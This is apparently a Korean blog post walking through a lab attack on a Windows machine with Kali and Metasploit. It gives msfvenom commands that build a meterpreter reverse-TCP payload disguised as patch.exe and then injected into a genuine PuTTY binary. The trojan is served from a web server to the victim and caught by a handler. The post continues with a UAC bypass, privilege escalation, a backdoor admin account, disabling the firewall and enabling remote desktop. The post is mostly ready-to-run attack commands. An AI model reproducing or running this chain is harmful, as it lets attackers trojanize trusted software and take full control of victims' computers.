공격대상이 방화벽이 on일 경우에는 어떤 방법이 있을까? 설치파일을 공격대상에게 보내서 사용자가 설치파일을 실행하게 되면 공격대상이 공격이 가능하게 한다.
msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp lhost=1.0.0.11 lport=4444 -f exe -o /root/patch.exe의 명령어 실행!
(홈 디렉토리에 포트 4444번을 쓰고 실행파일을 가진 patch.exe를 추가하겠다.)
Msfconsole
Use exploit/multi/handler
(Payload(페이로드) 연결을 받고 Handle(다룰) 수 있는 Handler로 이동하여 줌)
set payload windows/x64/meterpreter/reverse_tcp 실행
Show options으로 확인후 set lhost를 설정해 준다.(자기 자신의 ip)
Set lport 4444(아까 venom 설정해준 포트와 맞춰준다.)
exploit 실행! (대기중인 상황)
공격대상(1.0.0.101)에 pacth.exe를 설치했다. Patch를 실행~~
공격대상이 patch를 실행 하자마자 바로 meterpreter 접속이 된다!
정상적인 프로그램에 악성 코드 삽입 후 공격대상에게 실행 유도
Putty(64bit)에 삽입하기 위해서 먼저 wget명령어로 putty를 설치했다.
msfvenom을 이용하여 쉘코드를 정상적인 putty에 삽입
msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp lhost=1.0.0.11 lport=4444 -f exe -x putty.exe -o /root/fk_putty.exe 입력!
cp fk_putty.exe /var/www/html/download/ 입력!
명령어 입력(service apache2 start)
Kali의 아파치 웹서버를 이용해여 공격대상 시스템에서 파일 다운로드한다.
Msfconsole 명령과 use exploit/multi/handler 입력!
페이로드와 호스트, 포트설정을 한 후 실행한다.
공격대상이 putty를 실행하였다.
바로 접속이 되었음을 알 수 있다.
shell확인과 CHCP 65001(언어가 깨지는 것을 막아줌!)
계정을 생성해보면 권한이 없음을 알 수 있다. (Access is denied)
권한이 없기 떄문에 권한 상승을 해야 한다. getsystem 입력 후 background 입력!
Search uac을 통해 검색해서 2번째 것을 쓰겠다.(use 명령어 사용)
사용한 후 Session이 비어있음을 알 수 있다. Sessions 명령어를 통해 자기 자신의 session 확인 후 set session을 통해 할당하였다.
64bit target 설정!
**getsystem을 실행하여서 문제가 없는지 본다.
** migrate explore.exe(pid) -> explore.exe의 pid값으로 이주시켜준다.
Shell 입력 후 권한이 생겨 유저가 잘 생성되었다.
비밀번호 설정 It1로 설정해주었다.
방화벽은 다운, 원격데스크탑 서비스는 cmd명령어로 실행한다.
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f (원격데스크탑 설정)
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f (원격데스크탑 해체)
Rdesktop을 이용하여서 원격 접속
rdesktop -u duck -p It1 1.0.0.200(window 2008)
관리자의 그룹으로 duck이라는 계정을 추가해줬기 때문에 관리자의 권한을 가진다. 관리자의 권한을 가지는지 확인하기 위해 duck2라는 계정생성을 해보았다. 무사히 생성!
'보안 > LINUX' 카테고리의 다른 글
kali vmware tool 설치 (0) | 2019.07.12 |
---|---|
kali 한글 설치 (0) | 2019.07.12 |
SNMP 취약점을 통한 공격 (0) | 2019.07.08 |
칼리 리눅스 (강제 종료 공격) (0) | 2019.07.08 |
칼리 리눅스(방화벽 off) 이터널블루 공격 (0) | 2019.07.08 |